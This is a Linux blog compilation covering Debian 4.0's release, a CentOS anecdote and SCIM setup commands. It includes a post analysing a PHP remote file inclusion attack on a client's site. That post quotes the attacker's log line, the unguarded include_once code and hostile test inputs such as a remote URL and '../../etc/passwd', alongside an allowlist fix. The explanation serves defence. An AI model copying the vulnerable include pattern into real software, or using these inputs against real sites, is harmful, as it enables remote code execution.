Debian Hong Kong Gathering
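To celebrate the release of Debian 4.0, Debian HK held a gathering at Festival Walk at 3 pm today.
I was fortunate to be able to find the time to attend. At the gathering I met many Linux enthusiasts,
and we exchanged a lot of Linux experience and knowledge. It was a very good gathering.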
Blog of Wan Leung (Chris Wong, wanleung)
Debian Etch was finally released on 8th April, 2007.
Here is the notice from debian-announce@lists.debian.org.
Debian GNU/Linux 4.0 released
The Debian Project is pleased to announce the official release of Debian GNU/Linux version 4.0, codenamed "etch", after 21 months of constant development. Debian GNU/Linux is a free operating system which supports a total of eleven processor architectures and includes the KDE, GNOME and Xfce desktop environments. It also features cryptographic software and compatibility with the FHS v2.3 and software developed for version 3.1 of the LSB.
Using a now fully integrated installation process, Debian GNU/Linux 4.0 comes with out-of-the-box support for encrypted partitions. This release introduces a newly developed graphical frontend to the installation system supporting scripts using composed characters and complex languages; the installation system for Debian GNU/Linux has now been translated to 58 languages.
Also beginning with Debian GNU/Linux 4.0, the package management system has been improved regarding security and efficiency. Secure APT allows the verification of the integrity of packages downloaded from a mirror. Updated package indices won't be downloaded in their entirety, but instead patched with smaller files containing only differences from earlier versions.
Debian GNU/Linux runs on computers ranging from palmtops and handheld systems to supercomputers, and on nearly everything in between. A total of eleven architectures are supported including: Sun SPARC (sparc), HP Alpha (alpha), Motorola/IBM PowerPC (powerpc), Intel IA-32 (i386) and IA-64 (ia64), HP PA-RISC (hppa), MIPS (mips, mipsel), ARM (arm), IBM S/390 (s390) and -- newly introduced with Debian GNU/Linux 4.0 -- AMD64 and Intel EM64T (amd64).
Debian GNU/Linux can be installed from various installation media such as DVDs, CDs, USB sticks and floppies, or from the network. GNOME is the default desktop environment and is contained on the first CD. The K Desktop Environment (KDE) and the Xfce desktop can be installed through two new alternative CD images. Also newly available with Debian GNU/Linux 4.0 are multi-arch CDs and DVDs supporting installation of multiple architectures from a single disc.
Debian GNU/Linux can be downloaded right now via bittorrent (the recommended way), jigdo or HTTP; see <http://www.debian.org/CD/> for further information. It will soon be available on DVD and CD-ROM from numerous vendors <http://www.debian.org/CD/vendors/>, too.
This release includes a number of updated software packages, such as the K Desktop Environment 3.5 (KDE), an updated version of the GNOME desktop environment 2.14, the Xfce 4.4 desktop environment, the GNUstep desktop 5.2, X.Org 7.1, OpenOffice.org 2.0.4a, GIMP 2.2.13, Iceweasel (an unbranded version of Mozilla Firefox 2.0.0.3), Icedove (an unbranded version of Mozilla Thunderbird 1.5), Iceape (an unbranded version of Mozilla Seamonkey 1.0.8), PostgreSQL 8.1.8, MySQL 5.0.32, GNU Compiler Collection 4.1.1, Linux kernel version 2.6.18, Apache 2.2.3, Samba 3.0.24, Python 2.4.4 and 2.5, Perl 5.8.8, PHP 4.4.4 and 5.2.0, Asterisk 1.2.13, and more than 18,000 other ready to use software packages.
Upgrades to Debian GNU/Linux 4.0 from the previous release, Debian GNU/Linux 3.1 codenamed "sarge", are automatically handled by the aptitude package management tool for most configurations, and to a certain degree also by the apt-get package management tool. As always, Debian GNU/Linux systems can be upgraded quite painlessly, in place, without any forced downtime, but it is strongly recommended to read the release notes for possible issues. For detailed instructions about installing and upgrading Debian GNU/Linux, please see the release notes <http://www.debian.org/releases/etch/releasenotes>. Please note that the release notes will be further improved and translated to additional languages in the coming weeks.
About Debian
------------
Debian GNU/Linux is a free operating system, developed by more than a thousand volunteers from all over the world who collaborate via the Internet. Debian's dedication to Free Software, its non-profit nature, and its open development model make it unique among GNU/Linux distributions. The Debian project's key strengths are its volunteer base, its dedication to the Debian Social Contract, and its commitment to provide the best operating system possible. Debian 4.0 is another important step in that direction.
Contact Information
-------------------
For further information, please visit the Debian web pages at <http://www.debian.org/> or send mail to <press@debian.org>.
There was an interesting hack in the account of one of our clients on our web hosting service. It is the client's online library system, which is written in PHP. One day, the system admin reported that Postfix had died because of a large amount of spam mail being sent from the online library system. When I checked the log, I saw entries like the following:
1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?
When I went to the PHP file, I learned how the cracker had cracked the system. The problem is in the PHP code.
<?php
...
// Attacker-controlled value, used below without any validation
$pagename = $_GET['Name'];
…
?>
…
<?php include_once("{$pagename}_main.inc"); ?>
…
The problem is that $pagename has no guard to check the value obtained from $_GET['Name'].
include_once is able to include source from outside, e.g. http://example.com/aaa.php
So when a cracker uses 'http://example.org/aaa.txt?' as the name, i.e. requests the URL http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,
$pagename becomes http://example.org/aaa.txt? and the include_once call executes as:
<?php include_once("http://example.org/aaa.txt?_main.inc");?>
That executes the PHP script at http://example.org/aaa.txt, and _main.inc is passed along as an argument (the query string) to that request. This is a security hole in the system.
So, for security, if it is necessary to call include or include_once with a dynamic value,
there must first be a check that the value comes from the place you expect.
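One way to implement the check described above, as an added example rather than code from the client's system: the page name is matched against a fixed allowlist and the resolved file must sit inside the local page directory. PAGE_DIR, ALLOWED_PAGES and resolve_page() are hypothetical names and the sample inputs are constructed; separately from this check, PHP's allow_url_include setting (Off by default since PHP 5.2) stops include from fetching http:// URLs at all.

```php
<?php
// Added example. PAGE_DIR, ALLOWED_PAGES and resolve_page() are hypothetical
// names; they are not taken from the application described in the post.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'search', 'catalogue'];

// Map a user-supplied page name to a local include file, or return null.
function resolve_page($name, $baseDir = PAGE_DIR, $allowed = ALLOWED_PAGES)
{
    // Arrays (index.php?Name[]=x) and names not on the allowlist are refused.
    // The strict comparison also refuses URLs, "../" sequences and NUL bytes,
    // because none of them equals a known page name.
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $name . '_main.inc');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// In index.php the vulnerable include would become:
//   $file = resolve_page(isset($_GET['Name']) ? $_GET['Name'] : null);
//   if ($file === null) { http_response_code(404); exit; }
//   include_once $file;

// Demonstration on constructed input: a temporary directory with one page.
$tmp = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($tmp);
file_put_contents($tmp . '/home_main.inc', "<?php echo 'home'; ?>\n");
$samples = [
    'home',                          // on the allowlist, file exists
    'search',                        // on the allowlist, file missing
    'http://example.org/aaa.txt?',   // remote URL from the post
    '../../etc/passwd',              // directory traversal
    ['home'],                        // array instead of string
];
foreach ($samples as $s) {
    $file = resolve_page($s, $tmp, ['home', 'search']);
    printf("%-34s %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : 'include ' . $file);
}
unlink($tmp . '/home_main.inc');
rmdir($tmp);
```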
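From the time I moved up to year 3 of university until now, my open source projects have been on hold for almost three years.
Recently, for some reason, I suddenly feel like starting some new projects.
A while ago, when I had some free time, I replaced the banner image of the Gamebase Linux board with a new one, and it feels much fresher,
although the board doesn't get much traffic.
Linux and Free Software – Gamebase (forum) http://forum.gamebase.com.tw/board.jsp?l=2009&no=37008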
To use deb rather than source.
http://www.debian-administration.org/articles/78
An article from Linux Gazette on how to prevent DDoS attacks.
http://www.centos.org/modules/news/article.php?storyid=127
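This is a true story. One day the CentOS team received an e-mail from a government.
A town government wrote to CentOS, saying that their website had been hacked by CentOS people.
What the government spokesperson actually saw was the CentOS 3 Apache test page.
Like this page:
http://centos.hughesjr.com/testing/noindex_new.html
He also threatened to go to the FBI if the CentOS developers did not fix it within 12 hours.
http://www.centos.org/modules/news/article.php?storyid=127
The world really is full of strange things.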
Use update-alternatives to change the xinput setting so that SCIM can be used in an en_GB environment.
# update-alternatives --install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-anthy 60
# update-alternatives --install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-canna 50
# update-alternatives --install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-prime 50
# update-alternatives --install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/scim-skk 50
# update-alternatives --install /etc/X11/xinit/xinput.d/en_GB xinput-en_GB /etc/X11/xinit/xinput.d/none 10